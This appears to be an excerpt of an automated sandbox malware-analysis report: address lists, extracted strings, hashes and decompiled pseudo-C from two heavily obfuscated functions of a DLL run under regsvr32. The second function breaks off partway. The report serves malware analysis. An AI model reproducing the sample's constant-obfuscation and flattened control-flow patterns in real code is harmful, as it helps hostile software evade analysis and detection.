0x1001fb2f
0x1001fb30
0x1001fb39
0x1001fb43
0x1001fb47
0x1001fb4f
0x1001fb5a
0x1001fb62
0x1001fb6d
0x1001fb78
0x1001fb8b
0x1001fb92
0x1001fb9d
0x1001fba5
0x1001fbaa
0x1001fbaf
0x1001fbb7
0x1001fbbf
0x1001fbca
0x1001fbd5
0x1001fbe0
0x1001fbeb
0x1001fbf6
0x1001fc01
0x1001fc0c
0x1001fc17
0x1001fc22
0x1001fc2d
0x1001fc38
0x1001fc4b
0x1001fc52
0x1001fc5d
0x1001fc68
0x1001fc73
0x1001fc7b
0x1001fc86
0x1001fc91
0x1001fca4
0x1001fcab
0x1001fcb3
0x1001fcbe
0x1001fcc9
0x1001fcd1
0x1001fcdc
0x1001fce4
0x1001fcec
0x1001fcf4
0x1001fcfc
0x1001fd04
0x1001fd0c
0x1001fd11
0x1001fd15
0x1001fd1a
0x1001fd1e
0x1001fd26
0x1001fd2e
0x1001fd39
0x1001fd41
0x1001fd4c
0x1001fd57
0x1001fd5f
0x1001fd6a
0x1001fd75
0x1001fd80
0x1001fd8b
0x1001fd96
0x1001fd9e
0x1001fda6
0x1001fdb0
0x1001fdb5
0x1001fdbd
0x1001fdd1
0x1001fdd6
0x1001fddf
0x1001fdea
0x1001fdf5
0x1001fe00
0x1001fe0b
0x1001fe16
0x1001fe22
0x1001fe27
0x1001fe2d
0x1001fe32
0x1001fe3a
0x1001fe42
0x1001fe4c
0x1001fe4f
0x1001fe58
0x1001fe5c
0x1001fe64
0x1001fe6f
0x1001fe7a
0x1001fe85
0x1001fe95
0x1001fe99
0x1001fea1
0x1001fea9
0x1001febb
0x1001febe
0x1001fec5
0x1001fed7
0x1001fedc
0x1001fee3
0x1001fee5
0x1001fee5
0x1001fee5
0x1001feea
0x1001feea
0x1001feea
0x1001feea
0x1001fef0
0x00000000
0x00000000
0x1001fef6
0x100200f7
0x10020104
0x1002010b
0x10020112
0x10020114
0x10020115
0x1002011c
0x1002011e
0x10020126
0x1002012b
0x1002012e
0x1001fee5
0x1001fee5
0x1001fee5
0x00000000
0x1001fee5
0x1001fee5
0x1001ff02
0x100200e5
0x100200ea
0x100200ed
0x1001fee5
0x1001fee5
0x1001fee5
0x00000000
0x1001fee5
0x1001fee5
0x1001ff0e
0x10020097
0x1002009c
0x100200a3
0x100200a5
0x100200ac
0x00000000
0x100200ac
0x1001ff1a
0x00000000
0x1002031e
0x1001ff26
0x1001ff2e
0x00000000
0x1001ff34
0x1001ff43
0x1001ff49
0x1001fee5
0x1001fee5
0x1001fee5
0x00000000
0x1001fee5
0x1001fee5
0x1001ff2e
0x1001ff6a
0x1001ff9b
0x1001ffb9
0x1001ffc6
0x1001ffca
0x1001ffd1
0x10020022
0x1002003a
0x10020064
0x10020069
0x1002006c
0x1002006e
0x10020074
0x1001fee5
0x1001fee5
0x1001fee5
0x00000000
0x1001fee5
0x1001fee5
0x10020329
0x00000000
0x10020329
0x10020138
0x1002013e
0x1002025a
0x10020289
0x100202d1
0x100202d6
0x100202d9
0x100202db
0x100202e7
0x100202ec
0x00000000
0x100202dd
0x100202dd
0x00000000
0x100202dd
0x10020144
0x10020144
0x1002014a
0x10020236
0x1002023c
0x1001fee5
0x1001fee5
0x1001fee5
0x00000000
0x1001fee5
0x10020150
0x10020150
0x10020152
0x1002019e
0x100201aa
0x100201ae
0x100201fd
0x10020215
0x1002021a
0x1002021d
0x1001fee5
0x1001fee5
0x1001fee5
0x00000000
0x1001fee5
0x10020154
0x10020154
0x1002015a
0x00000000
0x10020160
0x10020181
0x10020186
0x1002018b
0x10020193
0x1001fee5
0x1001fee5
0x1001fee5
0x00000000
0x1001fee5
0x1001fee5
0x1002015a
0x10020152
0x1002014a
0x00000000
0x100202f1
0x100202f1
0x100202f1
0x00000000
0x1001feea

Strings

(H57, xrefs: 1001F8BD
AIO@, xrefs: 1001FE99
q, xrefs: 1001F6FD
i[, xrefs: 1001F2A4
n[, xrefs: 1001F3E9
7, xrefs: 1001FCDC
=m#M, xrefs: 1001FE53, 1001FE47
=m#M, xrefs: 1001FE5C
Y`, xrefs: 1001F9D3
ACX, xrefs: 1001F64B
Kj, xrefs: 1001F36A
Y, xrefs: 1001FD0C
C*Z, xrefs: 1001FC91
W/&, xrefs: 1001FD2E

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseFolderHandlePath
String ID: (H57$7$=m#M$=m#M$ACX$AIO@$C*Z$Kj$W/&$Y`$i[$n[$q$Y
API String ID: 1943059022-91059516
Opcode ID: 7c9f6960468f2270b78ba9a8552173b7b59b133d5bbe5404a23336af85d5b92d
Instruction ID: ea1ae7ee5fc4cfb77d49dc1298964a033cdd4dd953a25967e020f678edcacbab
Opcode Fuzzy Hash: 7c9f6960468f2270b78ba9a8552173b7b59b133d5bbe5404a23336af85d5b92d
Instruction Fuzzy Hash: BE82EF715083818FD378CF21C58AB9BBBE2FBC5348F10891DE5999A260DBB19949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 10002279 Relevance: 15.5, Strings: 12, Instructions: 521
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10002279(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1576;
				char _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				signed int _v1816;
				signed int _v1820;
				signed int _v1824;
				void* _t612;
				void* _t616;
				void* _t622;
				void* _t624;
				void* _t637;
				void* _t640;
				void* _t643;
				signed int _t645;
				signed int _t646;
				signed int _t647;
				signed int _t648;
				signed int _t649;
				signed int _t650;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				void* _t656;
				signed int _t718;
				signed int _t719;
				void* _t721;
				signed int _t725;
				void* _t727;

				_v1584 = _v1584 & 0x00000000;
				_v1820 = 0x956424;
				_v1820 = _v1820 * 0x3c;
				_t643 = __ecx;
				_t721 = 0xc497913;
				_t645 = 0x6f;
				_v1820 = _v1820 * 0x19;
				_v1820 = _v1820 + 0x3001;
				_v1820 = _v1820 ^ 0x6956f2f1;
				_v1628 = 0xea026a;
				_v1628 = _v1628 + 0xffff1f54;
				_v1628 = _v1628 ^ 0x00e921be;
				_v1720 = 0xa37a62;
				_v1720 = _v1720 / _t645;
				_v1720 = _v1720 | 0xedec9463;
				_v1720 = _v1720 ^ 0xededfd67;
				_v1768 = 0xe0b8a4;
				_v1768 = _v1768 << 1;
				_v1768 = _v1768 >> 0xf;
				_v1768 = _v1768 + 0x9c7;
				_v1768 = _v1768 ^ 0x00000d49;
				_v1808 = 0x8608bd;
				_v1808 = _v1808 << 1;
				_v1808 = _v1808 + 0xffff2f5e;
				_v1808 = _v1808 ^ 0x26aa1483;
				_v1808 = _v1808 ^ 0x27a14f31;
				_v1600 = 0x44b596;
				_v1600 = _v1600 | 0xbc5831c8;
				_v1600 = _v1600 ^ 0xbc549580;
				_v1668 = 0x2f436e;
				_t52 =  &_v1668; // 0x2f436e
				_t646 = 0x31;
				_v1668 =  *_t52 * 0x1b;
				_v1668 = _v1668 + 0x1db9;
				_v1668 = _v1668 ^ 0x04f4d8c7;
				_v1664 = 0x55e075;
				_v1664 = _v1664 >> 0xd;
				_v1664 = _v1664 / _t646;
				_v1664 = _v1664 ^ 0x0002bd38;
				_v1740 = 0xf61380;
				_t647 = 0x4c;
				_v1740 = _v1740 / _t647;
				_v1740 = _v1740 + 0xc48;
				_v1740 = _v1740 ^ 0x000ff767;
				_v1692 = 0xee6ad2;
				_v1692 = _v1692 + 0xcdc8;
				_v1692 = _v1692 >> 4;
				_v1692 = _v1692 ^ 0x00003f12;
				_v1656 = 0x5929f;
				_t648 = 0xd;
				_v1656 = _v1656 * 0x66;
				_v1656 = _v1656 / _t648;
				_v1656 = _v1656 ^ 0x002af2e9;
				_v1732 = 0xd79a88;
				_v1732 = _v1732 << 0xa;
				_v1732 = _v1732 + 0xab6f;
				_v1732 = _v1732 ^ 0x5e65d1a1;
				_v1644 = 0x2bba36;
				_v1644 = _v1644 + 0xffffcbca;
				_v1644 = _v1644 ^ 0x002bfd30;
				_v1588 = 0x1f0905;
				_v1588 = _v1588 << 2;
				_v1588 = _v1588 ^ 0x00731bb5;
				_v1636 = 0xe7b0fe;
				_t725 = 0x49;
				_v1636 = _v1636 / _t725;
				_v1636 = _v1636 ^ 0x0008cd19;
				_v1724 = 0xe54468;
				_v1724 = _v1724 + 0xefc;
				_v1724 = _v1724 << 3;
				_v1724 = _v1724 ^ 0x07285e67;
				_v1716 = 0x9bf7e7;
				_v1716 = _v1716 + 0xd4da;
				_v1716 = _v1716 + 0xfa58;
				_v1716 = _v1716 ^ 0x0092ffb5;
				_v1812 = 0xcf4175;
				_v1812 = _v1812 | 0xe9761211;
				_t649 = 0x59;
				_v1812 = _v1812 / _t649;
				_v1812 = _v1812 << 0xc;
				_v1812 = _v1812 ^ 0x112e81f0;
				_v1756 = 0xa27b3b;
				_v1756 = _v1756 | 0x7df97277;
				_v1756 = _v1756 << 5;
				_v1756 = _v1756 + 0xffff5e62;
				_v1756 = _v1756 ^ 0xbf6ce72b;
				_v1648 = 0xf348b2;
				_v1648 = _v1648 ^ 0x6757e3b0;
				_v1648 = _v1648 | 0x4660d2f1;
				_v1648 = _v1648 ^ 0x67ef3df8;
				_v1708 = 0xbbc4f1;
				_v1708 = _v1708 | 0x964afc75;
				_v1708 = _v1708 + 0xff1;
				_v1708 = _v1708 ^ 0x96f0ccaf;
				_v1804 = 0x2cf4b4;
				_v1804 = _v1804 >> 4;
				_v1804 = _v1804 | 0x1764ad82;
				_v1804 = _v1804 + 0x27d0;
				_v1804 = _v1804 ^ 0x176b06a6;
				_v1780 = 0x55600a;
				_v1780 = _v1780 | 0x5006bc21;
				_v1780 = _v1780 + 0xabb5;
				_v1780 = _v1780 >> 6;
				_v1780 = _v1780 ^ 0x014125d6;
				_v1652 = 0x13d657;
				_v1652 = _v1652 | 0xfbfffb7b;
				_v1652 = _v1652 ^ 0xfbff00bc;
				_v1700 = 0xb4c8a;
				_v1700 = _v1700 + 0xffff049e;
				_v1700 = _v1700 | 0xd21abeb5;
				_v1700 = _v1700 ^ 0xd2190f69;
				_v1676 = 0x96d050;
				_t650 = 0x2f;
				_v1676 = _v1676 * 0x57;
				_v1676 = _v1676 + 0xffff85ee;
				_v1676 = _v1676 ^ 0x3347c10b;
				_v1796 = 0x5bcb1f;
				_v1796 = _v1796 >> 5;
				_v1796 = _v1796 << 4;
				_v1796 = _v1796 | 0x9f40ae37;
				_v1796 = _v1796 ^ 0x9f6cd58f;
				_v1764 = 0x425dde;
				_v1764 = _v1764 << 4;
				_v1764 = _v1764 << 9;
				_v1764 = _v1764 + 0xffffbbd1;
				_v1764 = _v1764 ^ 0x4bb1ead3;
				_v1592 = 0x1448a6;
				_v1592 = _v1592 / _t650;
				_v1592 = _v1592 ^ 0x00098622;
				_v1788 = 0x4dee1;
				_v1788 = _v1788 >> 0x10;
				_t651 = 0x38;
				_t718 = 0x5b;
				_v1788 = _v1788 * 0x7a;
				_v1788 = _v1788 + 0xb8e9;
				_v1788 = _v1788 ^ 0x000a1f4d;
				_v1660 = 0x82b05;
				_v1660 = _v1660 >> 6;
				_v1660 = _v1660 >> 1;
				_v1660 = _v1660 ^ 0x00030aae;
				_v1772 = 0x25e099;
				_v1772 = _v1772 / _t651;
				_v1772 = _v1772 << 0xb;
				_v1772 = _v1772 / _t718;
				_v1772 = _v1772 ^ 0x000d9797;
				_v1816 = 0x90dfd8;
				_v1816 = _v1816 + 0xffff86fa;
				_v1816 = _v1816 << 3;
				_v1816 = _v1816 + 0x802f;
				_v1816 = _v1816 ^ 0x048e9925;
				_v1748 = 0x2d8d78;
				_v1748 = _v1748 ^ 0x066982d0;
				_v1748 = _v1748 ^ 0xb8b7b8a8;
				_v1748 = _v1748 ^ 0xbefe681d;
				_v1824 = 0x68722e;
				_t288 =  &_v1824; // 0x68722e
				_t652 = 0x4a;
				_v1824 =  *_t288 * 0x7e;
				_v1824 = _v1824 + 0x5473;
				_v1824 = _v1824 + 0xb9d5;
				_v1824 = _v1824 ^ 0x33693883;
				_v1620 = 0x51d233;
				_v1620 = _v1620 / _t652;
				_v1620 = _v1620 ^ 0x000991fd;
				_v1712 = 0x516580;
				_v1712 = _v1712 >> 3;
				_v1712 = _v1712 << 3;
				_v1712 = _v1712 ^ 0x005d7aba;
				_v1800 = 0x553322;
				_v1800 = _v1800 >> 6;
				_v1800 = _v1800 >> 0xc;
				_v1800 = _v1800 << 3;
				_v1800 = _v1800 ^ 0x0007b49f;
				_v1684 = 0x1ced34;
				_v1684 = _v1684 >> 0x10;
				_v1684 = _v1684 * 0x73;
				_v1684 = _v1684 ^ 0x000a666b;
				_v1612 = 0x3160e3;
				_v1612 = _v1612 ^ 0xfa00759d;
				_v1612 = _v1612 ^ 0xfa392f78;
				_v1784 = 0x35c247;
				_v1784 = _v1784 ^ 0x78c7e3c6;
				_v1784 = _v1784 ^ 0xc865b79e;
				_v1784 = _v1784 | 0x12662f27;
				_v1784 = _v1784 ^ 0xb2f13aad;
				_v1596 = 0x78b0dc;
				_v1596 = _v1596 + 0xffff7f0e;
				_v1596 = _v1596 ^ 0x007dd37b;
				_v1792 = 0x1cdaa7;
				_v1792 = _v1792 + 0xffff8e30;
				_v1792 = _v1792 | 0xc7409c8e;
				_v1792 = _v1792 * 0x23;
				_v1792 = _v1792 ^ 0x41babf76;
				_v1640 = 0x8473ba;
				_t653 = 0x22;
				_v1640 = _v1640 / _t653;
				_v1640 = _v1640 ^ 0x0005b785;
				_v1704 = 0x411c4d;
				_v1704 = _v1704 + 0xffffbfe2;
				_v1704 = _v1704 >> 0xe;
				_v1704 = _v1704 ^ 0x000078d4;
				_v1604 = 0xca6b3a;
				_v1604 = _v1604 << 0xc;
				_v1604 = _v1604 ^ 0xa6b9ca5e;
				_v1760 = 0x2e2c43;
				_v1760 = _v1760 | 0x33363e46;
				_v1760 = _v1760 ^ 0x067baaf7;
				_v1760 = _v1760 | 0x7c8ff9ef;
				_v1760 = _v1760 ^ 0x7dc885d8;
				_v1688 = 0x9df55c;
				_v1688 = _v1688 / _t725;
				_v1688 = _v1688 ^ 0x96b91d81;
				_v1688 = _v1688 ^ 0x96bbd723;
				_v1776 = 0x76f595;
				_v1776 = _v1776 + 0xe7ff;
				_v1776 = _v1776 ^ 0xc0b32ad5;
				_v1776 = _v1776 + 0xd5d4;
				_v1776 = _v1776 ^ 0xc0c28dc2;
				_v1632 = 0x56b7fe;
				_t654 = 0x6c;
				_v1632 = _v1632 / _t654;
				_v1632 = _v1632 ^ 0x000844bc;
				_v1696 = 0x5d44b1;
				_v1696 = _v1696 ^ 0x7f976699;
				_v1696 = _v1696 << 0xb;
				_v1696 = _v1696 ^ 0x5114339f;
				_v1616 = 0x39c327;
				_v1616 = _v1616 | 0x46d8743c;
				_v1616 = _v1616 ^ 0x46fd984f;
				_v1680 = 0x6319f9;
				_v1680 = _v1680 >> 1;
				_v1680 = _v1680 >> 0xb;
				_v1680 = _v1680 ^ 0x0004c1de;
				_v1624 = 0x6b5bfd;
				_v1624 = _v1624 << 0xc;
				_v1624 = _v1624 ^ 0xb5ba7add;
				_v1736 = 0x74bab3;
				_v1736 = _v1736 ^ 0xa7862b4b;
				_v1736 = _v1736 + 0xffff6046;
				_v1736 = _v1736 ^ 0xa7f1d4c4;
				_v1744 = 0x6bd787;
				_v1744 = _v1744 + 0x69e5;
				_v1744 = _v1744 | 0x822b430b;
				_v1744 = _v1744 ^ 0x826eee24;
				_v1672 = 0x30639;
				_v1672 = _v1672 + 0xffff2a03;
				_v1672 = _v1672 / _t718;
				_v1672 = _v1672 ^ 0x0004f1aa;
				_v1608 = 0xb6255c;
				_t655 = 0x6b;
				_v1608 = _v1608 / _t655;
				_v1608 = _v1608 ^ 0x00056ec3;
				_v1752 = 0x21091f;
				_v1752 = _v1752 | 0x74862a15;
				_v1752 = _v1752 * 0x6f;
				_v1752 = _v1752 >> 5;
				_v1752 = _v1752 ^ 0x04a9463d;
				_v1728 = 0xbb3f7;
				_v1728 = _v1728 >> 9;
				_v1728 = _v1728 >> 0xe;
				_v1728 = _v1728 ^ 0x000b14a3;
				_t719 = _v1584;
				while(1) {
					L1:
					while(1) {
						L2:
						_t656 = 0xba6316;
						do {
							L3:
							while(_t721 != 0x107803) {
								if(_t721 == _t656) {
									_push(_v1612);
									_t616 = E1000DB59(_v1712, _v1584, _v1720, _v1800, _t656, _v1684,  &_v1564,  &_v1580);
									_t727 = _t727 + 0x1c;
									__eflags = _t616;
									if(__eflags != 0) {
										E1001E373(_v1784, _v1580, _v1596, _v1792);
										E1001E373(_v1640, _v1576, _v1704, _v1604);
										_t727 = _t727 + 0x10;
									}
									L18:
									_t721 = 0xf71dc9b;
									while(1) {
										L1:
										L2:
										_t656 = 0xba6316;
										goto L3;
									}
								}
								if(_t721 == 0x146a86f) {
									_t622 = E1000FBF8();
									__eflags = E100030BE() - _t622;
									_t624 = 0xd4e690;
									_t721 = 0x7149f37;
									_t719 =  !=  ? 0xd4e690 : 0xc73e499;
									goto L2;
								}
								if(_t721 == 0x4b96ecb) {
									E10009574(_v1656,  &_v1044, _v1732, _v1644);
									 *((short*)(E1000FFDE(_v1588, _v1636,  &_v1044, _v1724) + _v1628 * 2)) = 0;
									E1000B200(_v1716, _v1812, __eflags, _v1756,  &_v524, _v1648);
									_push(_v1652);
									_push(_v1780);
									_push(_v1804);
									E1001734A(_v1700, __eflags, _v1676, _v1796, _v1764,  &_v1564, E10004BB4(0x10001854, _v1708), _v1592, 0x10001854,  &_v1044);
									E1000B9D7(_v1788, _v1660, _t631, _v1772);
									_t637 = E10009B80(_v1816, _v1748, _v1824,  &_v1564, _v1620, _t643);
									_t727 = _t727 + 0x64;
									__eflags = _t637;
									if(__eflags != 0) {
										_t624 = 0xd4e690;
										__eflags = _t719 - 0xd4e690;
										_t656 = 0xba6316;
										_t721 =  ==  ? 0xba6316 : 0x107803;
										continue;
									}
									goto L18;
								}
								if(_t721 == 0x7149f37) {
									__eflags = _t719 - _t624;
									if(__eflags != 0) {
										_t721 = 0x4b96ecb;
										continue;
									}
									_t640 = E10020E6D(_v1664, _v1740, _v1692,  &_v1584, _v1820);
									_t727 = _t727 + 0x14;
									__eflags = _t640;
									if(__eflags == 0) {
										return _t640;
									}
									_t721 = 0x4b96ecb;
									goto L1;
								}
								if(_t721 == 0xc497913) {
									_t721 = 0x146a86f;
									continue;
								}
								if(_t721 != 0xf71dc9b) {
									goto L26;
								}
								return E1001E373(_v1608, _v1584, _v1752, _v1728);
							}
							_push(_v1696);
							_push(_v1632);
							_push(_v1776);
							_push( &_v1580);
							_push(0);
							_push(_v1688);
							_push(0);
							_push(_v1768);
							_t612 = E100163F0(_v1760,  &_v1564, __eflags);
							_t727 = _t727 + 0x20;
							__eflags = _t612;
							if(_t612 != 0) {
								E1001E373(_v1616, _v1580, _v1680, _v1624);
								E1001E373(_v1736, _v1576, _v1744, _v1672);
								_t727 = _t727 + 0x10;
							}
							_t721 = 0xad3224d;
							_t656 = 0xba6316;
							L26:
							__eflags = _t721 - 0xad3224d;
						} while (__eflags != 0);
						return _t624;
					}
				}
			}

0x1000227f
0x10002289
0x1000229a
0x1000229e
0x100022a5
0x100022ac
0x100022af
0x100022b3
0x100022bb
0x100022c3
0x100022ce
0x100022d9
0x100022e4
0x100022fa
0x10002301
0x1000230c
0x10002317
0x1000231f
0x10002323
0x10002328
0x10002330
0x10002338
0x10002340
0x10002344
0x1000234c
0x10002354
0x1000235c
0x10002367
0x10002372
0x1000237d
0x10002388
0x10002390
0x10002393
0x1000239a
0x100023a5
0x100023b0
0x100023bb
0x100023ce
0x100023d5
0x100023e0
0x100023ec
0x100023f1
0x100023f7
0x100023ff
0x10002407
0x10002412
0x1000241d
0x10002425
0x10002430
0x10002443
0x10002444
0x10002454
0x1000245b
0x10002466
0x1000246e
0x10002473
0x1000247b
0x10002483
0x1000248e
0x1000249b
0x100024a6
0x100024b1
0x100024b9
0x100024c4
0x100024d8
0x100024dd
0x100024e6
0x100024f1
0x100024f9
0x10002501
0x10002506
0x1000250e
0x10002519
0x10002524
0x1000252f
0x1000253a
0x10002542
0x1000254e
0x10002553
0x10002557
0x1000255c
0x10002564
0x1000256c
0x10002574
0x10002579
0x10002581
0x10002589
0x10002594
0x1000259f
0x100025aa
0x100025b5
0x100025c0
0x100025cb
0x100025d6
0x100025e1
0x100025e9
0x100025ee
0x100025f6
0x100025fe
0x10002606
0x1000260e
0x10002616
0x1000261e
0x10002623
0x1000262b
0x10002636
0x10002641
0x1000264c
0x10002657
0x10002662
0x1000266d
0x10002678
0x1000268b
0x1000268c
0x10002693
0x1000269e
0x100026a9
0x100026b1
0x100026b6
0x100026bb
0x100026c3
0x100026cb
0x100026d3
0x100026d8
0x100026dd
0x100026e5
0x100026ef
0x10002705
0x1000270e
0x10002719
0x10002721
0x1000272b
0x1000272e
0x10002731
0x10002735
0x1000273d
0x10002745
0x10002750
0x10002758
0x1000275f
0x1000276a
0x1000277a
0x1000277e
0x1000278b
0x1000278f
0x10002797
0x1000279f
0x100027a7
0x100027ac
0x100027b4
0x100027bc
0x100027c4
0x100027cc
0x100027d4
0x100027dc
0x100027e4
0x100027e9
0x100027ea
0x100027ee
0x100027f6
0x100027fe
0x10002806
0x1000281a
0x10002821
0x1000282c
0x10002837
0x1000283f
0x10002847
0x10002852
0x1000285a
0x1000285f
0x10002864
0x10002869
0x10002871
0x1000287c
0x1000288c
0x10002893
0x1000289e
0x100028a9
0x100028b4
0x100028bf
0x100028c7
0x100028cf
0x100028d7
0x100028df
0x100028e7
0x100028f2
0x100028fd
0x10002908
0x10002910
0x10002918
0x10002925
0x10002929
0x10002933
0x10002947
0x1000294c
0x10002953
0x1000295e
0x10002969
0x10002974
0x1000297c
0x10002987
0x10002992
0x1000299a
0x100029a5
0x100029ad
0x100029b5
0x100029bd
0x100029c5
0x100029cd
0x100029e3
0x100029ea
0x100029f5
0x10002a00
0x10002a08
0x10002a10
0x10002a18
0x10002a20
0x10002a28
0x10002a3c
0x10002a41
0x10002a48
0x10002a53
0x10002a5e
0x10002a69
0x10002a71
0x10002a7c
0x10002a87
0x10002a92
0x10002a9d
0x10002aa8
0x10002aaf
0x10002ab7
0x10002ac2
0x10002acd
0x10002ad5
0x10002ae0
0x10002ae8
0x10002af0
0x10002af8
0x10002b00
0x10002b08
0x10002b10
0x10002b18
0x10002b20
0x10002b2b
0x10002b41
0x10002b4a
0x10002b55
0x10002b67
0x10002b6a
0x10002b71
0x10002b7c
0x10002b84
0x10002b91
0x10002b9a
0x10002b9f
0x10002ba7
0x10002baf
0x10002bb4
0x10002bb9
0x10002bc1
0x10002bc8
0x10002bc8
0x10002bcd
0x10002bcd
0x10002bcd
0x10002bd2
0x00000000
0x10002bd2
0x10002be0
0x10002def
0x10002e27
0x10002e2c
0x10002e2f
0x10002e31
0x10002e4d
0x10002e6e
0x10002e73
0x10002e73
0x10002d95
0x10002d95
0x10002bc8
0x10002bc8
0x10002bcd
0x10002bcd
0x00000000
0x10002bcd
0x10002bc8
0x10002bec
0x10002dca
0x10002dd6
0x10002ddd
0x10002de2
0x10002de7
0x00000000
0x10002de7
0x10002bf4
0x10002c9b
0x10002cd2
0x10002ced
0x10002cfa
0x10002d01
0x10002d05
0x10002d50
0x10002d65
0x10002d89
0x10002d8e
0x10002d91
0x10002d93
0x10002d9f
0x10002da9
0x10002dab
0x10002db0
0x00000000
0x10002db0
0x00000000
0x10002d93
0x10002c00
0x10002c45
0x10002c47
0x10002c7a
0x00000000
0x10002c7a
0x10002c67
0x10002c6c
0x10002c6f
0x10002c71
0x10002c3d
0x10002c3d
0x10002c73
0x00000000
0x10002c73
0x10002c08
0x10002c3e
0x00000000
0x10002c3e
0x10002c10
0x00000000
0x00000000
0x00000000
0x10002c32
0x10002e7b
0x10002e89
0x10002e97
0x10002e9b
0x10002e9c
0x10002e9e
0x10002ea5
0x10002ea7
0x10002eaf
0x10002eb4
0x10002eb7
0x10002eb9
0x10002ed7
0x10002ef2
0x10002ef7
0x10002ef7
0x10002efa
0x10002f04
0x10002f09
0x10002f09
0x10002f09
0x00000000
0x10002bd2
0x10002bcd

Strings

`1, xrefs: 1000289E
I, xrefs: 10002330
hD, xrefs: 100024F1
uU, xrefs: 100023B0
"3U, xrefs: 10002852
`U, xrefs: 10002606
sT, xrefs: 100027EE
.rh, xrefs: 100027E4
nC/, xrefs: 10002388
F>63, xrefs: 100029AD
i, xrefs: 10002B08
kf, xrefs: 10002893

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: `U$"3U$.rh$F>63$I$hD$kf$nC/$sT$uU$`1$i
API String ID: 0-3811460943
Opcode ID: ca0e7bc062465b4bed51e5826b8509ddd14342041074df354ee9f4c5f8159d82
Instruction ID: 65e33a27c166f228a74a2412bbaf03d7f068b574f1df6f09f79a8b061c69e05a
Opcode Fuzzy Hash: ca0e7bc062465b4bed51e5826b8509ddd14342041074df354ee9f4c5f8159d82
Instruction Fuzzy Hash: 34520D71509381DFE378CF21C94AB8BBBE2FBC4748F00892DE59986260D7B49949CF52

Uniqueness

Uniqueness Score: -1.00%

Function 10001B09 Relevance: 15.4, Strings: 12, Instructions: 384
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E10001B09(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v256;
				char _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				unsigned int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				unsigned int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _t340;
				signed int _t372;
				void* _t375;
				void* _t379;
				void* _t383;
				intOrPtr _t385;
				void* _t405;
				signed int _t407;
				void* _t410;
				signed int* _t411;
				void* _t424;
				void* _t425;
				signed int _t452;
				signed int _t464;
				void* _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				void* _t477;
				void* _t478;
				void* _t479;
				void* _t482;

				_push(_a20);
				_t477 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t340);
				_v344 = 0x12c061;
				_t479 = _t478 + 0x1c;
				_t407 = 0;
				_t410 = 0x7762430;
				_t468 = 0x6a;
				_v344 = _v344 * 0x1c;
				_v344 = _v344 ^ 0x020d0a9c;
				_v364 = 0x1981b9;
				_v364 = _v364 + 0xffff8097;
				_v364 = _v364 << 3;
				_v364 = _v364 >> 7;
				_v364 = _v364 ^ 0x00019025;
				_v356 = 0xbf724f;
				_v356 = _v356 + 0xffff17d9;
				_v356 = _v356 ^ 0x429ab3d8;
				_v356 = _v356 / _t468;
				_v356 = _v356 ^ 0x009fbcec;
				_v372 = 0x8d29f4;
				_t464 = 0xb;
				_t469 = 0x37;
				_v372 = _v372 * 0x4b;
				_v372 = _v372 + 0xffffdd8b;
				_v372 = _v372 | 0x931ee14e;
				_v372 = _v372 ^ 0xbb5e282e;
				_v380 = 0xa5783f;
				_v380 = _v380 + 0xfb45;
				_v380 = _v380 + 0xffffe86f;
				_v380 = _v380 >> 0xa;
				_v380 = _v380 ^ 0x000877d2;
